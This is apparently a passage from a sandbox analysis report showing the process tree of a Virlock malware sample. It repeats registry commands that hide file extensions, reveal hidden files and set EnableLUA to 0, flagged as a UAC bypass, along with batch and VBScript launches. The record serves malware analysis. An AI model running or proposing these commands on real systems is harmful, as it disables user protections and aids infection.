reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
148⤵
PID:3960

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
148⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
148⤵
- UAC bypass
- Modifies registry key
PID:2616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jkAMgwUc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
148⤵
PID:1136

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
149⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
146⤵
- Modifies visibility of file extensions in Explorer
PID:4700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
146⤵
- Modifies registry key
PID:3744

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
146⤵
- Modifies registry key
PID:4800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqMcYsEc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
146⤵
PID:4608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
147⤵
PID:4804

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
144⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
144⤵
PID:3940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
145⤵
PID:3348

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
144⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KUYQsUEw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
144⤵
PID:1252

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
145⤵
PID:4080

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
142⤵
- Modifies visibility of file extensions in Explorer
PID:1884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
142⤵
PID:1756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
142⤵
- UAC bypass
PID:2504

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:3304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WEcQgIQI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
142⤵
PID:2904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:1528

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
143⤵
PID:2488

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
140⤵
PID:4652

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
141⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
140⤵
PID:3180

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
140⤵
- UAC bypass
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MwIsEsAs.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
140⤵
PID:2352

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
141⤵
PID:3952

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
141⤵
PID:3108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
138⤵
- Modifies visibility of file extensions in Explorer
PID:3316

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
138⤵
PID:3420

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
138⤵
- UAC bypass
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZogIAAIE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
138⤵
PID:4632

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
139⤵
PID:4212

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
136⤵
- Modifies visibility of file extensions in Explorer
PID:5024

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
136⤵
PID:5084

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
136⤵
- UAC bypass
- Modifies registry key
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pecMAUwk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
136⤵
PID:2152

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
137⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
134⤵
- Modifies visibility of file extensions in Explorer
PID:3656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
134⤵
PID:3308

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
134⤵
PID:3560

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
135⤵
PID:680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TsIIcYIw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
134⤵
PID:1756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
135⤵
PID:1924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
135⤵
PID:1400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
132⤵
PID:3420

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
132⤵
PID:672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
133⤵
PID:3284

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
132⤵
- UAC bypass
- Modifies registry key
PID:448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xekAIsMk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
132⤵
PID:3752

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
133⤵
PID:4480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
133⤵
PID:1480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
130⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
130⤵
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
130⤵
- UAC bypass
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OsQIUYMQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
130⤵
PID:3132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
131⤵
PID:2784

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
128⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
128⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
128⤵
- UAC bypass
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mIkcMwEQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
128⤵
PID:4204

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
129⤵
PID:2324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
126⤵
- Modifies visibility of file extensions in Explorer
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
126⤵
- Modifies registry key
PID:4968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:5080

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
126⤵
- Modifies registry key
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGwMgcwM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
126⤵
PID:2980

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
127⤵
PID:4524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
127⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
124⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
124⤵
- Modifies registry key
PID:3952

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
124⤵
- UAC bypass
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RQYoIAkA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
124⤵
PID:3912

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
125⤵
PID:3304

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
122⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
122⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
122⤵
PID:1564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
123⤵
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NQswwQgA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
122⤵
PID:1628

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
123⤵
PID:3348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
120⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
120⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
120⤵
- UAC bypass
PID:436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\luAAgooo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
120⤵
PID:3700

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
121⤵
PID:2148

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
118⤵
- Modifies visibility of file extensions in Explorer
PID:4804

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
118⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
118⤵
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DyUIAwco.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
118⤵
PID:2140

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
119⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
116⤵
- Modifies visibility of file extensions in Explorer
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
116⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
116⤵
- UAC bypass
- Modifies registry key
PID:4076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
117⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GmckMIgQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
116⤵
PID:312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
117⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
114⤵
- Modifies visibility of file extensions in Explorer
PID:3832

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
114⤵
PID:3768

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
114⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wwsEMQUw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
114⤵
PID:3264

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
115⤵
PID:4968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
112⤵
- Modifies visibility of file extensions in Explorer
PID:4404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
112⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
112⤵
- UAC bypass
PID:4136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qwgAAcoU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
112⤵
PID:3924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
113⤵
PID:680

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
110⤵
PID:4020

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
110⤵
PID:3712

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:1028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
110⤵
- Modifies registry key
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UessoAAo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
110⤵
PID:3252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:3268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
111⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
108⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2592

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
108⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
108⤵
- UAC bypass
PID:868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tKQAEIwY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
108⤵
PID:372

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
109⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
106⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:5092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
106⤵
PID:1016

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
106⤵
- UAC bypass
PID:1136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUMsMwIE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
106⤵
PID:3584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
107⤵
PID:2472

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
107⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
104⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
104⤵
- Modifies registry key
PID:3552

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
104⤵
- UAC bypass
- Modifies registry key
PID:3040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XqEIMEoE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
104⤵
PID:3268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
105⤵
PID:1028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
102⤵
- Modifies visibility of file extensions in Explorer
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
102⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
102⤵
- UAC bypass
PID:3996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kskIkkUI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
102⤵
PID:2852

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
103⤵
PID:180

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
100⤵
- Modifies visibility of file extensions in Explorer
PID:4504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
100⤵
PID:4288

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
100⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KycEscwI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
100⤵
PID:3348

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
101⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
98⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
98⤵
PID:3312

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
98⤵
- UAC bypass
- Modifies registry key
PID:2928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WEMgEgQw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
98⤵
PID:2424

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
99⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
96⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
96⤵
- Modifies registry key
PID:4156

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
96⤵
- UAC bypass
PID:1900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gCEMssok.bat" "C:\Users\Admin\AppData\Local\Temp\2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe""
96⤵
PID:3864

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
97⤵
PID:2272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
94⤵
- Modifies visibility of file extensions in Explorer
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
